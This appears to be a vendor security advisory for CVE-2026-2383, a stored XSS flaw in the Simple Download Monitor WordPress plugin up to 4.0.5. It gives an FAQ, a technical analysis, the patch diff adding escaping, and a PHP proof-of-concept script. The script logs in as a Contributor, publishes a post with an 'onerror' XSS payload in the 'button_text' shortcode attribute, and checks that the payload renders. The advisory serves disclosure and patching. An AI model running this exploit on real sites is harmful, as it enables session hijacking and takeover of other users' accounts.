What is CVE-2026-2383?

CVE-2026-2383 is a stored cross-site scripting vulnerability in the Simple Download Monitor plugin for WordPress, affecting versions up to and including 4.0.5. It allows authenticated attackers with Contributor-level access and above to inject malicious scripts via custom fields, which execute when users access compromised pages.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of user-controlled custom field values. Attackers can exploit this by injecting JavaScript payloads through the `button_text` shortcode attribute, which persists in the post content and executes in the browsers of users visiting the affected pages.

Who is affected by this vulnerability?

Any WordPress site using the Simple Download Monitor plugin version 4.0.5 or earlier is at risk. Specifically, users with Contributor-level access and above can exploit this vulnerability, potentially affecting all visitors to the site who view the compromised content.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Simple Download Monitor plugin installed. If it is version 4.0.5 or earlier, your site is susceptible to CVE-2026-2383. Additionally, review your site’s posts for any suspicious custom fields or shortcode usages.

How can I fix this vulnerability?

The recommended fix is to update the Simple Download Monitor plugin to version 4.0.6 or later, where the vulnerability has been patched. Regularly updating all plugins and themes is essential to maintaining site security.

What does the severity rating of Medium mean?

The Medium severity rating indicates that while the vulnerability is not critical, it poses a significant risk if exploited. Attackers with Contributor-level access can execute arbitrary JavaScript, which may lead to session hijacking or content defacement, impacting user trust and site integrity.

What is the CVSS score for this vulnerability?

CVE-2026-2383 has a CVSS score of 6.4, which reflects a medium level of risk. This score considers factors such as the ease of exploitation and the potential impact on confidentiality, integrity, and availability.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can log in as a Contributor and inject a malicious payload into the `button_text` attribute of a download shortcode. This demonstrates the ability to execute JavaScript in the context of users accessing the compromised page, showcasing the practical implications of the vulnerability.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Simple Download Monitor plugin until a patch can be applied. Additionally, review user roles and limit Contributor access to trusted users only to minimize the risk of exploitation.

Are there any additional security measures I should take?

In addition to updating the plugin, implement security best practices such as regular backups, using security plugins to monitor for vulnerabilities, and conducting periodic security audits of your WordPress site to identify and remediate potential risks.

Where can I find more information about CVE-2026-2383?

More information about CVE-2026-2383 can be found on the National Vulnerability Database (NVD) and security advisory sites. Additionally, the plugin’s official repository may provide updates and further details regarding the vulnerability and its resolution.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2383: Simple Download Monitor <= 4.0.5 – Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Field (simple-download-monitor)

CVE ID CVE-2026-2383

Plugin simple-download-monitor

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 4.0.5

Patched Version 4.0.6

Disclosed February 25, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2383:
The vulnerability stems from insufficient output escaping of user-controlled custom field values in the Simple Download Monitor plugin. The plugin fails to escape the `$button_text_string` variable in multiple template functions before outputting it within HTML anchor tags. This variable originates from the `button_text` shortcode attribute, which attackers with Contributor+ privileges can control when creating or editing download posts. The plugin’s shortcode attribute processing function `sdm_validate_shortcode_atts` in `sdm-shortcodes.php` receives user input but only sanitizes it after version 4.0.5. Attackers inject malicious JavaScript payloads via the `button_text` shortcode attribute, which persists in the post content. When the download shortcode renders on public pages, the unescaped payload executes in visitors’ browsers. The patch adds `esc_attr()` calls to escape the `$button_text_string` variable in `sdm-utility-functions.php` lines 112, 371, and 420. It also adds `esc_attr()` calls for custom field values in template files `sdm-fancy-1.php`, `sdm-fancy-2.php`, and `sdm-fancy-3.php`. The patch adds `sanitize_text_field()` to the `button_text` attribute processing in `sdm-shortcodes.php` line 59. This vulnerability enables authenticated attackers with Contributor privileges to execute arbitrary JavaScript in the context of any user viewing the compromised download page, potentially leading to session hijacking, administrative account takeover, or content defacement.

Differential between vulnerable and patched code

Code Diff

--- a/simple-download-monitor/includes/sdm-utility-functions.php
+++ b/simple-download-monitor/includes/sdm-utility-functions.php
@@ -109,7 +109,7 @@
 	$data .= sdm_get_checkbox_for_termsncond();

 	$data .= '<span class="sdm-download-button">';
-	$data .= '<a href="#" name="sdm_dl_pass_submit" class="pass_sumbit sdm_pass_protected_download sdm_download_with_condition ' . esc_attr($class) . '">' . $button_text_string . '</a>';
+	$data .= '<a href="#" name="sdm_dl_pass_submit" class="pass_sumbit sdm_pass_protected_download sdm_download_with_condition ' . esc_attr($class) . '">' . esc_attr($button_text_string) . '</a>';
 	$data .= '</span>';
 	$data .= '<input type="hidden" name="download_id" value="' . $id . '" />';
 	$data .= '</form>';
@@ -368,7 +368,7 @@
 	//Check if Terms & Condition enabled
 	$data .= sdm_get_checkbox_for_termsncond();

-	$data .= '<a href="#" class="' . esc_attr($class) . ' sdm_download_with_condition">' . $button_text_string . '</a>';
+	$data .= '<a href="#" class="' . esc_attr($class) . ' sdm_download_with_condition">' . esc_attr($button_text_string) . '</a>';
 	$data .= '</div>';
 	$data .= '<input type="hidden" name="download_id" value="' . $id . '" />';
 	$data .= '</form>';
@@ -417,7 +417,7 @@
 	$data  = '<form action="' . $action_url . '" method="post" class="sdm-download-form"' . $window_target . '>';
 	$data .= sdm_get_checkbox_for_termsncond();
 	$data .= '<div class="sdm-termscond-button">';
-	$data .= '<a href="#" class="' . esc_attr($class) . ' sdm_download_with_condition">' . $button_text_string . '</a>';
+	$data .= '<a href="#" class="' . esc_attr($class) . ' sdm_download_with_condition">' . esc_attr($button_text_string) . '</a>';
 	$data .= '</div>';
 	$data .= '<input type="hidden" name="download_id" value="' . $id . '" />';
 	$data .= '</form>';
--- a/simple-download-monitor/includes/templates/sdm-fancy-1.php
+++ b/simple-download-monitor/includes/templates/sdm-fancy-1.php
@@ -111,21 +111,21 @@
 if ( ! empty( $isset_item_file_size ) ) {//Show file size info
 	$output .= '<div class="sdm_download_size">';
 	$output .= '<span class="sdm_download_size_label">' . __( 'Size: ', 'simple-download-monitor' ) . '</span>';
-	$output .= '<span class="sdm_download_size_value">' . $isset_item_file_size . '</span>';
+	$output .= '<span class="sdm_download_size_value">' . esc_attr($isset_item_file_size) . '</span>';
 	$output .= '</div>';
 }

 if ( ! empty( $isset_item_version ) ) {//Show version info
 	$output .= '<div class="sdm_download_version">';
 	$output .= '<span class="sdm_download_version_label">' . __( 'Version: ', 'simple-download-monitor' ) . '</span>';
-	$output .= '<span class="sdm_download_version_value">' . $isset_item_version . '</span>';
+	$output .= '<span class="sdm_download_version_value">' . esc_attr($isset_item_version) . '</span>';
 	$output .= '</div>';
 }

 if ( $show_date_fd ) {//Show date
 	$output .= '<div class="sdm_download_date">';
 	$output .= '<span class="sdm_download_date_label">' . __( 'Published: ', 'simple-download-monitor' ) . '</span>';
-	$output .= '<span class="sdm_download_date_value">' . $download_date . '</span>';
+	$output .= '<span class="sdm_download_date_value">' . esc_attr($download_date) . '</span>';
 	$output .= '</div>';
 }

--- a/simple-download-monitor/includes/templates/sdm-fancy-2.php
+++ b/simple-download-monitor/includes/templates/sdm-fancy-2.php
@@ -20,7 +20,7 @@

 // Get the download URL and generate the download button code.
 $download_url         = sdm_get_standard_download_url_from_id( $id );
-$download_button_code = '<a href="' . $download_url . '" class="sdm_fancy2_download_dl_link" target="' . $window_target . '">' . $button_text . '</a>';
+$download_button_code = '<a href="' . $download_url . '" class="sdm_fancy2_download_dl_link" target="' . $window_target . '">' . esc_attr($button_text) . '</a>';

 // Check to see if the download link cpt is password protected
 $get_cpt_object  = get_post( $id );
@@ -94,7 +94,7 @@
 if ( ! empty( $isset_item_file_size ) ) {
 	$output .= '<div class="sdm_fancy2_download_size">';
 	$output .= '<span class="sdm_fancy2_download_size_label">' . __( 'Size: ', 'simple-download-monitor' ) . '</span>';
-	$output .= '<span class="sdm_fancy2_download_size_value">' . $isset_item_file_size . '</span>';
+	$output .= '<span class="sdm_fancy2_download_size_value">' . esc_attr($isset_item_file_size) . '</span>';
 	$output .= '</div>';
 }

@@ -102,7 +102,7 @@
 if ( ! empty( $isset_item_version ) ) {
 	$output .= '<div class="sdm_fancy2_download_version">';
 	$output .= '<span class="sdm_fancy2_download_version_label">' . __( 'Version: ', 'simple-download-monitor' ) . '</span>';
-	$output .= '<span class="sdm_fancy2_download_version_value">' . $isset_item_version . '</span>';
+	$output .= '<span class="sdm_fancy2_download_version_value">' . esc_attr($isset_item_version) . '</span>';
 	$output .= '</div>';
 }

@@ -110,7 +110,7 @@
 if ( $show_date_fd ) {
 	$output .= '<div class="sdm_fancy2_download_date">';
 	$output .= '<span class="sdm_fancy2_download_date_label">' . __( 'Published: ', 'simple-download-monitor' ) . '</span>';
-	$output .= '<span class="sdm_fancy2_download_date_value">' . $download_date . '</span>';
+	$output .= '<span class="sdm_fancy2_download_date_value">' . esc_attr($download_date) . '</span>';
 	$output .= '</div>';
 }

--- a/simple-download-monitor/includes/templates/sdm-fancy-3.php
+++ b/simple-download-monitor/includes/templates/sdm-fancy-3.php
@@ -23,7 +23,7 @@
 // Get download details page URL
 $dl_post_url                = get_permalink( $id );
 $link_text                  = __( 'View Details', 'simple-download-monitor' );
-$download_details_link_code = '<a href="' . $dl_post_url . '" class="sdm_fancy3_view_details" title="' . esc_html( $item_title ) . '" target="' . $window_target . '">' . esc_attr( $link_text ) . '</a>';
+$download_details_link_code = '<a href="' . esc_url($dl_post_url) . '" class="sdm_fancy3_view_details" title="' . esc_html( $item_title ) . '" target="' . esc_attr($window_target) . '">' . esc_attr( $link_text ) . '</a>';

 $output = '';

--- a/simple-download-monitor/main.php
+++ b/simple-download-monitor/main.php
@@ -3,7 +3,7 @@
  * Plugin Name: Simple Download Monitor
  * Plugin URI: https://simple-download-monitor.com/
  * Description: Easily manage downloadable files and monitor downloads of your digital files from your WordPress site.
- * Version: 4.0.5
+ * Version: 4.0.6
  * Author: Tips and Tricks HQ, Ruhul Amin, Josh Lobe
  * Author URI: https://www.tipsandtricks-hq.com/development-center
  * License: GPL2
@@ -14,7 +14,7 @@
 	exit;
 }

-define( 'WP_SIMPLE_DL_MONITOR_VERSION', '4.0.5' );
+define( 'WP_SIMPLE_DL_MONITOR_VERSION', '4.0.6' );
 define( 'WP_SIMPLE_DL_MONITOR_DIR_NAME', dirname( plugin_basename( __FILE__ ) ) );
 define( 'WP_SIMPLE_DL_MONITOR_URL', plugins_url( '', __FILE__ ) );
 define( 'WP_SIMPLE_DL_MONITOR_PATH', plugin_dir_path( __FILE__ ) );
--- a/simple-download-monitor/sdm-shortcodes.php
+++ b/simple-download-monitor/sdm-shortcodes.php
@@ -56,6 +56,10 @@
 	// Remove spaces from color key to make a proper CSS class name.
 	$atts['color'] = str_replace( ' ', '', $atts['color'] );

+	if (isset($atts['button_text'])) {
+		$atts['button_text'] = sanitize_text_field($atts['button_text']);
+	}
+
 	return $atts;
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2383 - Simple Download Monitor <= 4.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Field

<?php
$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Payload to inject into button_text attribute
$payload = '"><img src=x onerror=alert(document.domain)>';

// Create a download post with malicious shortcode
$post_data = array(
    'title' => 'Malicious Download',
    'content' => '[sdm_download id="1" fancy="0" button_text="' . $payload . '"]',
    'status' => 'publish',
    'post_type' => 'sdm_downloads'
);

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Get nonce for creating posts
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php?post_type=sdm_downloads');
$new_post_page = curl_exec($ch);
preg_match('/"_wpnonce" value="([a-f0-9]+)"/', $new_post_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

// Submit the malicious download post
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array_merge($post_data, array(
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $target_url . '/wp-admin/post-new.php?post_type=sdm_downloads',
    'action' => 'editpost',
    'post_ID' => '0',
    'originalaction' => 'editpost',
    'post_type' => 'sdm_downloads',
    'user_ID' => '1',
    'save' => 'Publish'
))));
$create_response = curl_exec($ch);

// Extract the created post ID
preg_match('/post=([0-9]+)&/', $create_response, $post_id_matches);
$post_id = $post_id_matches[1] ?? '1';

// Verify the XSS payload is present in the rendered page
curl_setopt($ch, CURLOPT_URL, $target_url . '/?p=' . $post_id);
curl_setopt($ch, CURLOPT_POST, 0);
$final_page = curl_exec($ch);

if (strpos($final_page, $payload) !== false) {
    echo "XSS payload successfully injected. Visit: " . $target_url . "/?p=" . $post_id . "n";
} else {
    echo "Injection failed. Check permissions or plugin version.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-2383?
Understanding the vulnerability
CVE-2026-2383 is a stored cross-site scripting vulnerability in the Simple Download Monitor plugin for WordPress, affecting versions up to and including 4.0.5. It allows authenticated attackers with Contributor-level access and above to inject malicious scripts via custom fields, which execute when users access compromised pages.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of user-controlled custom field values. Attackers can exploit this by injecting JavaScript payloads through the `button_text` shortcode attribute, which persists in the post content and executes in the browsers of users visiting the affected pages.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Simple Download Monitor plugin version 4.0.5 or earlier is at risk. Specifically, users with Contributor-level access and above can exploit this vulnerability, potentially affecting all visitors to the site who view the compromised content.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check if your site is vulnerable, verify the version of the Simple Download Monitor plugin installed. If it is version 4.0.5 or earlier, your site is susceptible to CVE-2026-2383. Additionally, review your site’s posts for any suspicious custom fields or shortcode usages.
How can I fix this vulnerability?
Mitigation steps
The recommended fix is to update the Simple Download Monitor plugin to version 4.0.6 or later, where the vulnerability has been patched. Regularly updating all plugins and themes is essential to maintaining site security.
What does the severity rating of Medium mean?
Understanding risk levels
The Medium severity rating indicates that while the vulnerability is not critical, it poses a significant risk if exploited. Attackers with Contributor-level access can execute arbitrary JavaScript, which may lead to session hijacking or content defacement, impacting user trust and site integrity.
What is the CVSS score for this vulnerability?
Evaluating impact
CVE-2026-2383 has a CVSS score of 6.4, which reflects a medium level of risk. This score considers factors such as the ease of exploitation and the potential impact on confidentiality, integrity, and availability.
How does the proof of concept demonstrate the vulnerability?
Exploit demonstration
The proof of concept provided illustrates how an attacker can log in as a Contributor and inject a malicious payload into the `button_text` attribute of a download shortcode. This demonstrates the ability to execute JavaScript in the context of users accessing the compromised page, showcasing the practical implications of the vulnerability.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Simple Download Monitor plugin until a patch can be applied. Additionally, review user roles and limit Contributor access to trusted users only to minimize the risk of exploitation.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, implement security best practices such as regular backups, using security plugins to monitor for vulnerabilities, and conducting periodic security audits of your WordPress site to identify and remediate potential risks.
Where can I find more information about CVE-2026-2383?
Resources for further reading
More information about CVE-2026-2383 can be found on the National Vulnerability Database (NVD) and security advisory sites. Additionally, the plugin’s official repository may provide updates and further details regarding the vulnerability and its resolution.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations